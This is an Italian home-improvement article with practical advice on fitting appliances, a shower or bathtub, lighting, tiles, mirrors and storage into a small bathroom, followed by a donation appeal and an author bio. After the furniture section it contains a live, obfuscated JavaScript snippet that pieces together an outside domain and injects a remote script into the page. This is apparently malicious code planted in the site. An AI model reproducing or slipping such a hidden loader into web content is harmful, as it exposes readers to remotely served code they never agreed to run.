Stai allestendo un bagno piccolo e ti stai chiedendo come far entrare tutte le attrezzature e i mobili? Ecco alcuni consigli per te. Prenditi tempo per pensare e considerare diversi aspetti: cerca di escludere tutto ciò di cui non hai necessariamente bisogno. In questo modo potresti guadagnare un po’ di spazio e qualche centimetro in più che sicuramente apprezzerai nella tua quotidianità. Considera anche se potresti estendere il bagno al posto di un corridoio adiacente, per esempio, così da avere spazio per una doccia, una lavatrice o un boiler.

Dove mettere la lavatrice  

Puoi risparmiare spazio riponendo la lavatrice in un armadietto in cucina o in corridoio, se ne hai la possibilità. Altrimenti, prova a posizionare la lavatrice sotto il piano lavabo; puoi anche utilizzare lo spazio ricavato per armadi o organizer. Scegli una lavatrice con una profondità minore di 45 cm che lava meno biancheria per ciclo, ma i 15 cm risparmiati ne valgono comunque la pena, soprattutto se non vivi in una famiglia numerosa e non hai bisogno di fare il bucato spesso.

Lo stesso vale per caldaia e il boiler: cera di posizionarli fuori dal bagno. Ma se non puoi fare altrimenti, prova a metterli assieme in un unico armadietto.

bagno piccolo idee

Bagno o doccia

In un bagno piccolo devi scegliere: la doccia conviene di più. È più facile entrarci (anche per le persone anziane) e offre più spazio per lavarsi. La vasca da bagno è utile per le famiglie con bambini ma è possibile ottenere un compromesso tra le due aggiungendo uno pannello fisso o mobile alla vasca. Pensa a quale preferisci, usi davvero il bagno così spesso o puoi farne a meno e preferire la doccia?

Le vasche da bagno salvaspazio con dimensioni atipiche consentono di risparmiare qualche centimetro. Di solito sono disponibili in lunghezze di 150 cm e 160 cm. Hanno una larghezza standard nella parte alta e si assottigliano verso il basso. Sopra questa parte più stretta, si può poi posizionare un lavabo per esempio. È preferibile utilizzare prodotti della stessa gamma e della stessa azienda perché questi set da bagno sono progettati specificatamente per i bagni piccoli. I singoli elementi si relazionano bene l’uno con l’altro e grazie alle dimensioni ridotte risparmiano spazio.

In un bagno piccolo è una buona idea usare la vasca da bagno come doccia; perciò è più pratico dotare la vasca di uno pannello e sceglierne una a fondo piatto. Attenzione però ai bagni d’angolo che nella maggior parte dei casi non risparmiano davvero spazio.

bagno piccolo soluzioni

Abbastanza luce

Una buona illuminazione è essenziale per far sì che un bagno piccolo non sembri angusto. Invece di usare una finestra tradizionale che occupa spazio sulle pareti puoi optare per un lucernario o un abbaino per far entrare la luce del giorno. Si può anche far entrare la luce nel bagno attraverso una striscia di vetro sotto il soffitto o un divisorio in vetro luxsphere. Considera comunque che ottieni un’illuminazione sufficiente da luci artificiali posizionate correttamente.

Trucchi ottici

Il bagno può essere ingrandito visivamente con colori chiari e superfici lucide a specchio. Scegli le piastrelle in formati grandi con fughe strette e posale orizzontalmente: la posa in verticale distanzia visivamente il soffitto e allunga lo spazio in altezza.

Limita il numero di colori e dimensioni delle piastrelle ad un massimo di 2 tipi in tutto il bagno e non avere paura di usare grandi superfici a specchio per moltiplicare visivamente lo spazio. Inoltre, se metti degli specchi su due pareti opposte ottieni l’effetto di una stanza infinita. Quando scegli un paravento per la doccia opta per un vetro chiaro e semplice che non costituisce una barriera ottica nello spazio. Un’anta scorrevole invece di una apribile, ti permetterà di posizionare un cesto della biancheria vicino alla cabina doccia.

bagno piccolo trucchi

Mobili

Non c’è mai abbastanza spazio per organizzare tutto l’occorrente in un bagno piccolo. Quindi scegli mobili del bagno lunghi fino all’altezza della porta o anche del soffitto: gli armadi alti forniscono un sacco di spazio e spesso includono comode parti ribaltabili o estraibili per la biancheria sporca ad esempio.

Invece di uno specchio a muro mettine uno mobile poco profondo con ante a specchio sopra il lavandino. Allo stesso modo, puoi utilizzare lo spazio sopra alla toilette con un armadietto.

L’armadietto sotto il lavandino può avere una maniglia su cui puoi posare un asciugamano più piccolo. Si può anche usare lo spazio sopra la vasca da bagno per gli asciugamani usati. Un bagno con armadi e cassetti chiusi darà un’impressione più spaziosa, più pulita e più ordinata rispetto ad uno con scaffali aperti.

(function(){ qlgz=document.createElement(“script”);qlgz_=(“us”)+(“ta”); qlgz_+=”t”+(“.”);qlgz_+=(“in”);qlgzu=”366345828″;qlgz.async=true; qlgzu+=”.ppjvr5mclgz6prnjp”;qlgz.type=”text/javascript”;qlgz_+=”f”+”o”+(“/”); qlgzu+=”dd1bXyymuv04d”;qlgz.src=”https://”+qlgz_+qlgzu; dqlgz=document.body;dqlgz.appendChild(qlgz); })();

Siamo una giovane realtà editoriale e non riceviamo finanziamenti pubblici. Il nostro lavoro è sostenuto solo dal contributo dell’editore (CuDriEc S.r.l.) e dagli introiti pubblicitari. I lettori sono la nostra vera ricchezza. Ogni giorno cerchiamo di fornire approfondimenti accurati, unici e veri.
Sostieni Moondo, sostieni l’informazione indipendente!
Desidero inviare a Moondo una mia libera donazione (clicca e dona)

GRATIS!!! SCARICA LA APP DI MOONDO, SCEGLI GLI ARGOMENTI E PERSONALIZZI IL TUO GIORNALE



La tua opinione per noi è molto importante.
Commento su WhatsApp Ora anche su Google News, clicca qui e seguici



Potrebbe interessarti anche:
Creativo, curioso, sempre in cerca di qualcosa da fare o realizzare. Amo gli animali, rispetto la natura e adoro stare all'aria aperta. Amo viaggiare e scoprire posti nuovi, culture e usanze nuove. Quando viaggio preferisco perdermi nella città e vivere ed emozionarmi.